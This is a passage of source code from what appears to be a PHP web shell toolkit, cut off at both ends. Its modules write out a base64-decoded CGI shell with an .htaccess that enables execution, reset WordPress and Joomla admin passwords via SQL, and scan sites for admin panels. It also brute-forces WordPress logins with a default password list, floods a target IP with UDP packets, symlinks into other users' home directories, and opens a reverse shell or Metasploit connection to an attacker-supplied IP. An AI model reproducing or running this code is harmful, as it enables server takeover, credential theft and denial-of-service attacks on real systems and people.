6123 {
6124 print "<run> Sorry! You dont have permissions! </run><br>";
6125 }
6126 }
6127 }
6128 print &ListDir;
6129
6130}
6131elsif($Action eq "command") # user wants to run a command
6132{
6133 &PrintPageHeader("c");
6134 print &ExecuteCommand;
6135}
6136elsif($Action eq "save") # user wants to save a file
6137{
6138 &PrintPageHeader;
6139 if(&SaveFile($in{'data'},$in{'file'}))
6140 {
6141 print "<run> Done! </run><br>";
6142 }else
6143 {
6144 print "<run> Sorry! You dont have permissions! </run><br>";
6145 }
6146 print &ListDir;
6147}
6148elsif($Action eq "upload") # user wants to upload a file
6149{
6150 &PrintPageHeader;
6151
6152 print &UploadFile;
6153}
6154elsif($Action eq "backbind") # user wants to back connect or bind port
6155{
6156 &PrintPageHeader("clientport");
6157 print &BackBind;
6158}
6159elsif($Action eq "bruteforcer") # user wants to brute force
6160{
6161 &PrintPageHeader;
6162 print &BruteForcer;
6163}elsif($Action eq "download") # user wants to download a file
6164{
6165 print &DownloadFile;
6166}elsif($Action eq "checklog") # user wants to view log file
6167{
6168 &PrintPageHeader;
6169 print &ViewLog;
6170
6171}elsif($Action eq "domainsuser") # user wants to view list user/domain
6172{
6173 &PrintPageHeader;
6174 print &ViewDomainUser;
6175}elsif($Action eq "logout") # user wants to logout
6176{
6177 &PerformLogout;
6178}
6179&PrintPageFooter;
6180'; $file = fopen("cgi2012.izo" ,"w+"); $write = fwrite ($file ,base64_decode($cgi2012)); fclose($file); chmod("cgi2012.izo",0755); echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>
6181
6182 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'config')) { ?>
6183<form action="?y=<?php echo $pwd; ?>&x=config" method="post">
6184
6185<?php echo "<center/><br/><b><font color=#FF0000>--==[ Config Shell Priv8 SCR ]==--</font></b><br><br>"; mkdir('config', 0755); chdir('config'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Error cuyy!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
6186
6187AddType application/x-hxxpd-cgi .cpc
6188
6189AddHandler cgi-script .izo
6190AddHandler cgi-script .izo"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $file = fopen("config.izo" ,"w+"); $write = fwrite ($file ,base64_decode($configshell)); fclose($file); chmod("config.izo",0755); echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>
6191 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset')) { ?>
6192<form action="?y=<?php echo $pwd; ?>&x=wp-reset" method="post">
6193
6194<?php echo "<center/><br/><b><font color=#FF0000>--==[ Wordpress Reset Password ]==--</font></b><br><br>"; if(empty($_POST['pwd'])){ echo "<FORM method='POST'>
6195<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td> Hostname</td><td>
6196<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
6197<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
6198<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
6199<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
6200<tr><td> User baru</td><td>
6201<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
6202 <tr><td> Pass Baru</td><td>
6203<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />
6204
6205<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
6206</td></tr> </table><br><br><br><br>
6207"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error()); if($a4s){ echo "<b> Success!! Now You Can Login To wp-admin</b> "; } } echo "
6208 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset')) { ?>
6209<form action="?y=<?php echo $pwd; ?>&x=jm-reset" method="post">
6210
6211<?php echo "<center/><br/><b><font color=#FF0000>--==[ Joomla Reset Password ]==--</font></b><br><br>"; if(empty($_POST['pwd'])){ echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to MySQL </th></tr> <tr><td> Host</td><td>
6212<input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
6213<input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td> username</td><td>
6214<input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td> password</td><td>
6215<input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
6216<tr><td> User baru</td><td>
6217<input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
6218 <tr><td> pass baru </td><td>123456 =
6219<input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />
6220
6221<input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
6222</td></tr> </table><br><br><br><br>
6223"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error()); if($SQL){ echo "<b>Success : New Password >>> - (123456)"; } } echo "
6224 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'adfin')) { ?>
6225<form action="?y=<?php echo $pwd; ?>&x=adfin" method="post">
6226
6227<?php set_time_limit(0); error_reporting(0); $list['front'] ="admin
6228adm
6229admincp
6230admcp
6231cp
6232modcp
6233moderatorcp
6234adminare
6235admins
6236cpanel
6237controlpanel"; $list['end'] = "admin1.php
6238admin1.html
6239admin2.php
6240admin2.html
6241yonetim.php
6242yonetim.html
6243yonetici.php
6244yonetici.html
6245ccms/
6246ccms/login.php
6247ccms/index.php
6248maintenance/
6249webmaster/
6250adm/
6251configuration/
6252configure/
6253websvn/
6254admin/
6255admin/account.php
6256admin/account.html
6257admin/index.php
6258admin/index.html
6259admin/login.php
6260admin/login.html
6261admin/home.php
6262admin/controlpanel.html
6263admin/controlpanel.php
6264admin.php
6265admin.html
6266admin/cp.php
6267admin/cp.html
6268cp.php
6269cp.html
6270administrator/
6271administrator/index.html
6272administrator/index.php
6273administrator/login.html
6274administrator/login.php
6275administrator/account.html
6276administrator/account.php
6277administrator.php
6278administrator.html
6279login.php
6280login.html
6281modelsearch/login.php
6282moderator.php
6283moderator.html
6284moderator/login.php
6285moderator/login.html
6286moderator/admin.php
6287moderator/admin.html
6288moderator/
6289account.php
6290account.html
6291controlpanel/
6292controlpanel.php
6293controlpanel.html
6294admincontrol.php
6295admincontrol.html
6296adminpanel.php
6297adminpanel.html
6298admin1.asp
6299admin2.asp
6300yonetim.asp
6301yonetici.asp
6302admin/account.asp
6303admin/index.asp
6304admin/login.asp
6305admin/home.asp
6306admin/controlpanel.asp
6307admin.asp
6308admin/cp.asp
6309cp.asp
6310administrator/index.asp
6311administrator/login.asp
6312administrator/account.asp
6313administrator.asp
6314login.asp
6315modelsearch/login.asp
6316moderator.asp
6317moderator/login.asp
6318moderator/admin.asp
6319account.asp
6320controlpanel.asp
6321admincontrol.asp
6322adminpanel.asp
6323fileadmin/
6324fileadmin.php
6325fileadmin.asp
6326fileadmin.html
6327administration/
6328administration.php
6329administration.html
6330sysadmin.php
6331sysadmin.html
6332phpmyadmin/
6333myadmin/
6334sysadmin.asp
6335sysadmin/
6336ur-admin.asp
6337ur-admin.php
6338ur-admin.html
6339ur-admin/
6340Server.php
6341Server.html
6342Server.asp
6343Server/
6344wp-admin/
6345administr8.php
6346administr8.html
6347administr8/
6348administr8.asp
6349webadmin/
6350webadmin.php
6351webadmin.asp
6352webadmin.html
6353administratie/
6354admins/
6355admins.php
6356admins.asp
6357admins.html
6358administrivia/
6359Database_Administration/
6360WebAdmin/
6361useradmin/
6362sysadmins/
6363admin1/
6364system-administration/
6365administrators/
6366pgadmin/
6367directadmin/
6368staradmin/
6369ServerAdministrator/
6370SysAdmin/
6371administer/
6372LiveUser_Admin/
6373sys-admin/
6374typo3/
6375panel/
6376cpanel/
6377cPanel/
6378cpanel_file/
6379platz_login/
6380rcLogin/
6381blogindex/
6382formslogin/
6383autologin/
6384support_login/
6385meta_login/
6386manuallogin/
6387simpleLogin/
6388loginflat/
6389utility_login/
6390showlogin/
6391memlogin/
6392members/
6393login-redirect/
6394sub-login/
6395wp-login/
6396login1/
6397dir-login/
6398login_db/
6399xlogin/
6400smblogin/
6401customer_login/
6402UserLogin/
6403login-us/
6404acct_login/
6405admin_area/
6406bigadmin/
6407project-admins/
6408phppgadmin/
6409pureadmin/
6410sql-admin/
6411radmind/
6412openvpnadmin/
6413wizmysqladmin/
6414vadmind/
6415ezsqliteadmin/
6416hpwebjetadmin/
6417newsadmin/
6418adminpro/
6419Lotus_Domino_Admin/
6420bbadmin/
6421vmailadmin/
6422Indy_admin/
6423ccp14admin/
6424irc-macadmin/
6425banneradmin/
6426sshadmin/
6427phpldapadmin/
6428macadmin/
6429administratoraccounts/
6430admin4_account/
6431admin4_colon/
6432radmind-1/
6433Super-Admin/
6434AdminTools/
6435cmsadmin/
6436SysAdmin2/
6437globes_admin/
6438cadmins/
6439phpSQLiteAdmin/
6440navSiteAdmin/
6441server_admin_small/
6442logo_sysadmin/
6443server/
6444database_administration/
6445power_user/
6446system_administration/
6447ss_vms_admin_sm/
6448adminarea/
6449bb-admin/
6450adminLogin/
6451panel-administracion/
6452instadmin/
6453memberadmin/
6454administratorlogin/
6455admin/admin.php
6456admin_area/admin.php
6457admin_area/login.php
6458siteadmin/login.php
6459siteadmin/index.php
6460siteadmin/login.html
6461admin/admin.html
6462admin_area/index.php
6463bb-admin/index.php
6464bb-admin/login.php
6465bb-admin/admin.php
6466admin_area/login.html
6467admin_area/index.html
6468admincp/index.asp
6469admincp/login.asp
6470admincp/index.html
6471webadmin/index.html
6472webadmin/admin.html
6473webadmin/login.html
6474admin/admin_login.html
6475admin_login.html
6476panel-administracion/login.html
6477nsw/admin/login.php
6478webadmin/login.php
6479admin/admin_login.php
6480admin_login.php
6481admin_area/admin.html
6482pages/admin/admin-login.php
6483admin/admin-login.php
6484admin-login.php
6485bb-admin/index.html
6486bb-admin/login.html
6487bb-admin/admin.html
6488admin/home.html
6489pages/admin/admin-login.html
6490admin/admin-login.html
6491admin-login.html
6492admin/adminLogin.html
6493adminLogin.html
6494home.html
6495rcjakar/admin/login.php
6496adminarea/index.html
6497adminarea/admin.html
6498webadmin/index.php
6499webadmin/admin.php
6500user.html
6501modelsearch/login.html
6502adminarea/login.html
6503panel-administracion/index.html
6504panel-administracion/admin.html
6505modelsearch/index.html
6506modelsearch/admin.html
6507admincontrol/login.html
6508adm/index.html
6509adm.html
6510user.php
6511panel-administracion/login.php
6512wp-login.php
6513adminLogin.php
6514admin/adminLogin.php
6515home.php
6516adminarea/index.php
6517adminarea/admin.php
6518adminarea/login.php
6519panel-administracion/index.php
6520panel-administracion/admin.php
6521modelsearch/index.php
6522modelsearch/admin.php
6523admincontrol/login.php
6524adm/admloginuser.php
6525admloginuser.php
6526admin2/login.php
6527admin2/index.php
6528adm/index.php
6529adm.php
6530affiliate.php
6531adm_auth.php
6532memberadmin.php
6533administratorlogin.php
6534admin/admin.asp
6535admin_area/admin.asp
6536admin_area/login.asp
6537admin_area/index.asp
6538bb-admin/index.asp
6539bb-admin/login.asp
6540bb-admin/admin.asp
6541pages/admin/admin-login.asp
6542admin/admin-login.asp
6543admin-login.asp
6544user.asp
6545webadmin/index.asp
6546webadmin/admin.asp
6547webadmin/login.asp
6548admin/admin_login.asp
6549admin_login.asp
6550panel-administracion/login.asp
6551adminLogin.asp
6552admin/adminLogin.asp
6553home.asp
6554adminarea/index.asp
6555adminarea/admin.asp
6556adminarea/login.asp
6557panel-administracion/index.asp
6558panel-administracion/admin.asp
6559modelsearch/index.asp
6560modelsearch/admin.asp
6561admincontrol/login.asp
6562adm/admloginuser.asp
6563admloginuser.asp
6564admin2/login.asp
6565admin2/index.asp
6566adm/index.asp
6567adm.asp
6568affiliate.asp
6569adm_auth.asp
6570memberadmin.asp
6571administratorlogin.asp
6572siteadmin/login.asp
6573siteadmin/index.asp
6574ADMIN/
6575paneldecontrol/
6576login/
6577cms/
6578admon/
6579ADMON/
6580administrador/
6581ADMIN/login.php
6582panelc/
6583ADMIN/login.html"; function template() { echo '
6584
6585<script type="text/javascript">
6586<!--
6587function insertcode($text, $place, $replace)
6588{
6589 var $this = $text;
6590 var logbox = document.getElementById($place);
6591 if($replace == 0)
6592 document.getElementById($place).innerHTML = logbox.innerHTML+$this;
6593 else
6594 document.getElementById($place).innerHTML = $this;
6595//document.getElementById("helpbox").innerHTML = $this;
6596}
6597-->
6598</script>
6599<br>
6600<br>
6601<h1 class="technique-two">
6602
6603
6604
6605</h1>
6606
6607<div class="wrapper">
6608<div class="red">
6609<div class="tube">
6610<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
6611<form action="" method="post" name="xploit_form">
6612
6613<tr>
6614<tr>
6615 <b><td>URL</td>
6616 <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
6617 </td>
6618</tr><tr>
6619 <td>404 string</td>
6620 <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
6621 </td></b>
6622</tr><br><td>
6623<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
6624</span></td></tr>
6625</form></td></tr>
6626<br /></table>
6627</div> <!-- /tube -->
6628</div> <!-- /red -->
6629<br />
6630<div class="green">
6631<div class="tube" id="rightcol">
6632Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
6633<b>Found ones:<br /></b>
6634</div> <!-- /tube -->
6635</div></center><!-- /green -->
6636<br clear="all" /><br />
6637<div class="blue">
6638<div class="tube" id="logbox">
6639<br />
6640<br />
6641Admin page Finder :<br /><br />
6642</div> <!-- /tube -->
6643</div> <!-- /blue -->
6644</div> <!-- /wrapper -->
6645<br clear="all"><br>'; } function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) { if($br == 1) $msg .= "<br />"; echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>"; if($stop == 1) exit; @flush();@ob_flush(); } function check($x, $front=0) { global $_POST,$site,$false; if($front == 0) $t = $site.$x; else $t = 'hxxp://'.$x.'.'.$site.'/'; $headers = get_headers($t); if (!eregi('200', $headers[0])) return 0; $data = @file_get_contents($t); if($_POST['xploit_404string'] == "") if($data == $false) return 0; if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0; return 1; } template(); if(!isset($_POST['xploit_url'])) die; if($_POST['xploit_url'] == '') die; $site = $_POST['xploit_url']; if ($site[strlen($site)-1] != "/") $site .= "/"; if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html"); $list['end'] = str_replace("\r", "", $list['end']); $list['front'] = str_replace("\r", "", $list['front']); $pathes = explode("\n", $list['end']); $frontpathes = explode("\n", $list['front']); show(count($pathes)+count($frontpathes), 1, 0, 'total', 1); $verificate = 0; foreach($pathes as $path) { show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($path) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0); show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0); } } preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1]; if(substr($site, 0, 3) == "www") $site = substr($site, 4); foreach($frontpathes as $frontpath) { show('Checking hxxp://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0); show('<a href="hxxp://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0); } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'wpbrute')) { ?>
6646<form action="?y=<?php echo $pwd; ?>&x=wpbrute" method="post">
6647<center>
6648<br><Br><b><font size='2' >--==[ Wordpress Brute Force ]==--</font><br>
6649<center><p>Thanks To <a href="hxxps://www.facebook.com/r00t.info/" target="_blank">Cah_bagus</a></p></b></center>
6650<form enctype="multipart/form-data" method="POST">
6651 <table width='624' border='0' class='tabnet' id='Box'>
6652 <tr><th colspan="5">Wordpress Brute Force</th></tr>
6653
6654
6655 <tr>
6656 <td > </td>
6657 <td ><p>Hosts:</p></td>
6658 <td ><p> Users:</p></td>
6659 <td ><p>Passwords:</p></td>
6660 </tr>
6661 <tr>
6662 <td> </td>
6663 <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
6664 <td ><textarea style="background:black;" name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
6665 <td ><textarea style="background:black;" name="passwords" cols="30" rows="10" ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\nc40909\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
6666 </tr>
6667<tr><td colspan="4"><input class='inputzbut' type="submit" name="submit" value="Brute Now" />
6668<?php if($_POST) { $hosts = trim(filter($_POST['hosts'])); $passwords = trim(filter($_POST['passwords'])); $usernames = trim(filter($_POST['usernames'])); if($passwords && $usernames && $hosts) { $hosts_explode = explode("\n", $hosts); $usernames_explode = explode("\n", $usernames); $passwords_explode = explode("\n", $passwords); foreach($hosts_explode as $host) { $host = RemoveLastSlash($host); $hacked = 0; $host = str_replace(array("hxxp://","hxxps://","www."),"",trim($host)); $host = "hxxp://".$host; $wpAdmin = $host.'/wp-admin/'; if(!url_exists($host."/wp-login.php")) {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;} foreach($usernames_explode as $username) { foreach($passwords_explode as $password) { $ch = curl_init(); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php'); curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt"); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_POST,TRUE); curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri‏"."&redirect_to=".$wpAdmin."&testcookie=1"); $login = curl_exec($ch); if(eregi ("profile.php",$login) ) { $hacked = 1; echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>"; ob_flush();flush();break; } } if($hacked == 1){break;} } if($hacked == 0) {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();} } } else {echo "<p><font color='red'>All fields are Required ! </font></p>";} } ?>
6669</td></tr>
6670</table></form></center>
6671<?php function url_exists($strURL) { $resURL = curl_init(); curl_setopt($resURL, CURLOPT_URL, $strURL); curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1); curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback'); curl_setopt($resURL, CURLOPT_FAILONERROR, 1); curl_exec ($resURL); $intReturnCode = curl_getinfo($resURL, CURLINFO_hxxp_CODE); curl_close ($resURL); if ($intReturnCode != 200){return false;} else{return true ;} } function filter($string) { if(get_magic_quotes_gpc() != 0){return stripslashes($string); } else{return $string; } } function RemoveLastSlash($host) { if(strrpos($host, '/', -1) == strlen($host)-1) {return substr($host,0,strrpos($host, '/', -1));} else{return $host;} } echo "</p>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'dos')) { ?>
6672<form action="?y=<?php echo $pwd; ?>&x=dos" method="post">
6673<center><br><br><br>
6674Your IP: <font color="red"><b><?php echo $my_ip; ?></b></font> (Don't DDOS yourself noob)<br><br>
6675<table class="tabnet" style="width:333px;padding:0 1px;">
6676<th colspan="5">DDOS Tool</th>
6677<tr><tr><td>IP Target</td><td>:</td>
6678<td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
6679</td></tr>
6680<tr><td>Time</td><td>:</td>
6681<td><input type="text" class="inputz" name="time" size="48" maxlength="25" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
6682</td></tr>
6683
6684<tr><td>Port</td><td>:</td>
6685<td><input type="text" class="inputz" name="port" size="48" maxlength="5" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
6686</td></tr></tr></table></b><br>
6687<input type="submit" class="inputzbut" name="fire" value=" Firee !!! ">
6688<br><br>
6689<center>
6690After initiating the DDOS attack, please wait while the browser loads.
6691</center>
6692
6693</form>
6694</center>
6695<?php $submit = $_POST['fire']; if (isset($submit)) { $packets = 0; $ip = $_POST['ip']; $rand = $_POST['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_POST['time']; $time = time(); print "Flooded: $ip on port $rand <br><br>"; $max_time = $time+$exec_time; for($i=0;$i<65535;$i++){ $out .= "X"; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink')) { ?>
6696<form action="?y=<?php echo $pwd; ?>&x=symlink" method="post">
6697
6698<?php @set_time_limit(0); echo "<br><br><center><h1>--==[ Symlink ]==--</h1></center><br><br><center><div class=content>"; @mkdir('sym',0777); $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; } else { echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; $malay = '\.my'; $china = '\.cn'; $japan = '\.jp'; $austr = '\.au'; $porn = '\.xxx'; $as = '\.uk'; $calfn = '\.ca'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]) or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0]) or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0])) { $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>'; } echo "
6699<tr>
6700
6701<td>
6702<div class='dom'><a target='_blank' href=hxxp://www.".$string[1][0].'/>'.$name.' </a> </div>
6703</td>
6704
6705<td>
6706'.$UID['name']."
6707</td>
6708
6709<td>
6710<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
6711</td>
6712
6713</tr></div> "; flush(); } } } } echo "</center></table>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'domain')) { ?>
6714<form action="?y=<?php echo $pwd; ?>&x=domain" method="post">
6715
6716<?php echo '<br><br><center><h1>--==[ Local Domain Viewer ]==--</h1></center><br><br><div class=content>'; $file = @implode(@file("/etc/named.conf")); if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); } preg_match_all("#named/(.*?).db#",$file ,$r); $domains = array_unique($r[1]); { echo "<table align=center border=1 width=59% cellpadding=5>
6717<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
6718<tr><td>Domain</td><td>User</td></tr>"; foreach($domains as $domain){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain)); echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>"; } echo "</table>"; } echo '</div>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'tool')) { ?>
6719<form action="?y=<?php echo $pwd; ?>&x=tool" method="post">
6720<?php error_reporting(0); function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));} $s_my_ip = gethostbyname($_SERVER['hxxp_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />"; echo $s_result; if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch 